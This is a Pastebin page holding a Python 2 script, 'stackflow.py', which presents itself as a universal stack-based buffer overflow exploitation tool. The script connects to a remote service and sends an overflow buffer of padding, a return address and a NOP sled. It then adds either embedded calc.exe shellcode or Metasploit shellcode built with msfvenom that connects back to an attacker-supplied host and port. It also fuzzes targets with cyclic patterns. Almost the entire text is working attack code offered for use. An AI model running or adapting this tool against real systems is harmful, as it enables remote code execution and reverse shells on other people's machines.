API tools faq
paste
BIe

stackflow

BIe
Feb 15th, 2014
225
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.85 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #
  3. # Stackflow.py - Universal stack-based buffer overflow exploitation tool
  4. # by @d4rkcat github.com/d4rkcat
  5. #
  6. ## This program is free software: you can redistribute it and/or modify
  7. ## it under the terms of the GNU General Public License as published by
  8. ## the Free Software Foundation, either version 3 of the License, or
  9. ## (at your option) any later version.
  10. #
  11. ## This program is distributed in the hope that it will be useful,
  12. ## but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. ## GNU General Public License at (http://www.gnu.org/licenses/) for
  15. ## more details.
  16.  
  17. from socket import socket, SOCK_STREAM, AF_INET
  18. from os import system
  19. from argparse import ArgumentParser
  20.  
  21. parser = ArgumentParser(prog='stackflow', usage='./stackflow.py OPTIONS')
  22. parser.add_argument('-r', "--rhost", type=str, help='rhost')
  23. parser.add_argument('-p', "--rport", type=str, help='rport')
  24. parser.add_argument('-c', "--cmds", type=str, help='commands to send to server before overflow')
  25. parser.add_argument('-v', "--vulncmd", type=str, help='vulnerable command')
  26. parser.add_argument('-o', "--offset", type=int, help='offset to EIP')
  27. parser.add_argument('-a', "--returnadd", type=str, help='return addess')
  28. parser.add_argument('-n', "--nops", type=int, help='number of NOPS \\x90 to prepend')
  29. parser.add_argument('-m', "--payload", type=str, help='MSF payload')
  30. parser.add_argument('-i', "--lhost", type=str, help='lhost')
  31. parser.add_argument('-l', "--lport", type=str, help='lport')
  32. parser.add_argument('-f', "--fuzz", type=str, help='Fuzz command with cyclic pattern')
  33. parser.add_argument('-e', "--cfexport", type=str, help='Export exploit config to file')
  34. parser.add_argument('-g', "--cfimport", type=str, help='Import exploit config from file')
  35. parser.add_argument('-t', "--calc", action="store_true", help='Send a calc.exe shellcode')
  36. parser.add_argument('-d', "--display", action="store_true", help='Display the exploit buffer')
  37. args = parser.parse_args()
  38.  
  39. def banner():
  40. print ''' MMMMMMMMMM
  41. MMMMMMMMMMMMMMMM
  42. MMMMMMMMMMMMMMMMMMMM
  43. MMMMMMM MMMMMMMM
  44. MMMMMM MMMMMMM
  45. MMMMM MMMMMM
  46. MMMM MMMMMM
  47. MMMM MMMMMM
  48. MMMMM MMMMMM
  49. MMMM MMMMMMM
  50. MMMM MMMMMMM
  51. MMMM MMMMMMMM
  52. MMMM MMMMMMMMMM
  53. MMMM MMMMMMMMMMMMMM
  54. MMMM MMMMMMMMMMMMMMMM
  55. .MMM MMMMMMMMMMMMMMMMMMM.
  56. MMM MMMMMMMMMMMMMMMMMMMMM
  57. M MMMMMMMMMMMMMMMMMMMMMMM
  58. MMMMMMMMMMMMMMMMMMMMMMMM
  59. MMMMMMMMMMMMMMMMMMMMMMMMMM
  60. MMMMMMMMMMMMMMMMMMMMMMMMMM
  61. MMMMMMMMMMMMMMMMMMMMMMMMMMM
  62. MMMMMMMMMMMMMMMMMMMMMMMMMMMM
  63. M MMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  64. MM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  65. MMM M MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  66. MMMMM MMMMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  67. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  68. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  69. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  70. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  71. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  72. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  73. O.MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMM
  74. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMM
  75. . MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  76. . :MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  77. M MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  78. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM7 MMMMM
  79. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  80. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  81. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMM MMMMMMM
  82. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMM MMMMMMM
  83. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMM
  84. .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  85. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  86. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  87. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  88. MMMMMMMM MMMMMMMMMMMMMMMMMMMMM
  89. .MMM MMMMMMMMMMMMMMM
  90. MMMMMMMMMMM
  91. MMMMMMM stackflow.py
  92. by d4rkcat
  93.  
  94. '''
  95.  
  96. def pwn(rhost,rport,payload,buflen,lhost,lport):
  97. es = socket(AF_INET, SOCK_STREAM)
  98. print ' [>] Attempting to connect to ' + rhost + ' on port ' + rport + '..'
  99. try:
  100. es.connect((rhost, int(rport)))
  101. print ' [<] ' + es.recv(2048)
  102. print " [^] Connection established.\n"
  103. except:
  104. print "\n [X] Could not connect to " + rhost + " on port " + rport
  105. exit()
  106.  
  107. if args.cmds:
  108. cmds = args.cmds.strip('\n').split('&')
  109. for cmd in cmds:
  110. es.send(cmd + '\r\n')
  111. print ' [>] ' + cmd
  112. try:
  113. print ' [<] ' + es.recv(2048)
  114. except:
  115. pass
  116.  
  117. if vulncmd:
  118. buf = vulncmd + ' '
  119. else:
  120. buf = ''
  121.  
  122. if fuzz:
  123. print "\n [*] Generating Pattern.\n"
  124. system('$(locate pattern_create | grep work/tools | head -n 1) ' + fuzz + ' > /tmp/fuzz')
  125. p = open('/tmp/fuzz', 'r')
  126. buf += p.read()
  127. p.close()
  128. else:
  129. a, b = divmod(buflen, len('PwN3d!'))
  130. buf += 'PwN3d!' * a + 'PwN3d!'[:b]
  131. buf += returnadd
  132. buf += "\x90" * nops
  133.  
  134. if calc:
  135. print " [*] Using calc.exe shellcode."
  136. buf += ("\xbf\xc2\x51\xc1\x05\xda\xd4\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x7a\x0e\x03\xb8\x5f\x23\xf0\xc0\x88\x2a\xfb"
  137. "\x38\x49\x4d\x75\xdd\x78\x5f\xe1\x96\x29\x6f\x61\xfa\xc1\x04\x27\xee\x52\x68\xe0\x01\xd2\xc7\xd6\x2c\xe3\xe9\xd6\xe2\x27\x6b"
  138. "\xab\xf8\x7b\x4b\x92\x33\x8e\x8a\xd3\x29\x61\xde\x8c\x26\xd0\xcf\xb9\x7a\xe9\xee\x6d\xf1\x51\x89\x08\xc5\x26\x23\x12\x15\x96"
  139. "\x38\x5c\x8d\x9c\x67\x7d\xac\x71\x74\x41\xe7\xfe\x4f\x31\xf6\xd6\x81\xba\xc9\x16\x4d\x85\xe6\x9a\x8f\xc1\xc0\x44\xfa\x39\x33"
  140. "\xf8\xfd\xf9\x4e\x26\x8b\x1f\xe8\xad\x2b\xc4\x09\x61\xad\x8f\x05\xce\xb9\xc8\x09\xd1\x6e\x63\x35\x5a\x91\xa4\xbc\x18\xb6\x60"
  141. "\xe5\xfb\xd7\x31\x43\xad\xe8\x22\x2b\x12\x4d\x28\xd9\x47\xf7\x73\xb7\x96\x75\x0e\xfe\x99\x85\x11\x50\xf2\xb4\x9a\x3f\x85\x48"
  142. "\x49\x04\x79\x03\xd0\x2c\x12\xca\x80\x6d\x7f\xed\x7e\xb1\x86\x6e\x8b\x49\x7d\x6e\xfe\x4c\x39\x28\x12\x3c\x52\xdd\x14\x93\x53"
  143. "\xf4\x76\x72\xc0\x94\x56\x11\x60\x3e\xa7")
  144. else:
  145. print " [*] Generating " + payload + " shellcode.\n"
  146. cmd = str('$(which msfvenom) -p ' + payload + ''' -e x86/shikata_ga_nai -i 2 -b \\x00\\xff\\x0a\\x0d\\xf1\\x20\\x40 -f py LHOST=''' + lhost + ' LPORT=' + lport + ''' | tail -n +2 | cut -c 8- | tr -d '\n' | tr -d '"' > /tmp/shlcde''')
  147. system(cmd)
  148. p = open('/tmp/shlcde', 'r')
  149. buf += str(p.read().decode('string_escape'))
  150. p.close()
  151.  
  152. buf += "\r\n"
  153.  
  154. if display:
  155. print '\n [*] Exploit Buffer: ' + str(buf)
  156. try:
  157. es.send(buf)
  158. if not fuzz:
  159. print '\n [$] Buffer sent, evil shellcode should be running.. ;)'
  160. if calc:
  161. print '\n [$] Calc.exe should be running, enjoy your calculations..\n'
  162. else:
  163. print '\n [$] Payload ' + payload + ' should be connecting back to ' + lhost + ' on port ' + lport + '\n'
  164. else:
  165. print ' [Z] Cyclic pattern fuzzing buffer of ' + fuzz + ' length sent.'
  166. except:
  167. print "\n [X] Exploit Failed! :("
  168.  
  169. es.settimeout(0.5)
  170. try:
  171. es.recv(2048)
  172. except:
  173. pass
  174. es.close()
  175.  
  176. if args.cfimport:
  177. if args.cfimport.endswith('.py'):
  178. args.cfimport = args.cfimport[:-3]
  179. cf = args.cfimport
  180. try:
  181. print ' [*] Loading ' + cf + '.py config file\n'
  182. args = __import__(cf)
  183. args.cfexport = None
  184. except:
  185. print ' [*] Config file ' + cf + '.py not found!\n'
  186. exit()
  187.  
  188. lhost = args.lhost
  189. lport = args.lport
  190. rhost = args.rhost
  191. rport = args.rport
  192. payload = args.payload
  193. buflen = args.offset
  194. fuzz = args.fuzz
  195. calc = args.calc
  196. display = args.display
  197. vulncmd = args.vulncmd
  198. returnadd = args.returnadd
  199.  
  200. if args.nops:
  201. nops = args.nops
  202. else:
  203. nops = 16
  204.  
  205. if not fuzz and not calc:
  206. if not buflen or not lhost or not lport or not payload or not returnadd or not buflen:
  207. print ' [*] You must specify the local host, local port, payload, return address and EIP offset!\n'
  208. banner()
  209. parser.print_help()
  210. exit()
  211.  
  212. if not rhost or not rport:
  213. print ' [*] You must specify the remote host and remote port!\n'
  214. banner()
  215. parser.print_help()
  216. exit()
  217.  
  218. if returnadd:
  219. returnadd = '\\x' + returnadd[6:8] + '\\x' + returnadd[4:6] + '\\x' + returnadd[2:4] + '\\x' + returnadd[0:2]
  220. returnadd = returnadd.decode('string_escape')
  221.  
  222. if args.cfexport:
  223. conf = str(args).replace('Namespace', '').strip('(').strip(')').split(',')
  224. cf = open(args.cfexport + '.py', 'w')
  225. for var in conf:
  226. if not var.startswith('cf'):
  227. cf.write(var.strip() + '\n')
  228. cf.close()
  229. print ' [*] Exploit config exported to ' + args.cfexport + '.py\n'
  230. else:
  231. pwn(rhost,rport,payload,buflen,lhost,lport)
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!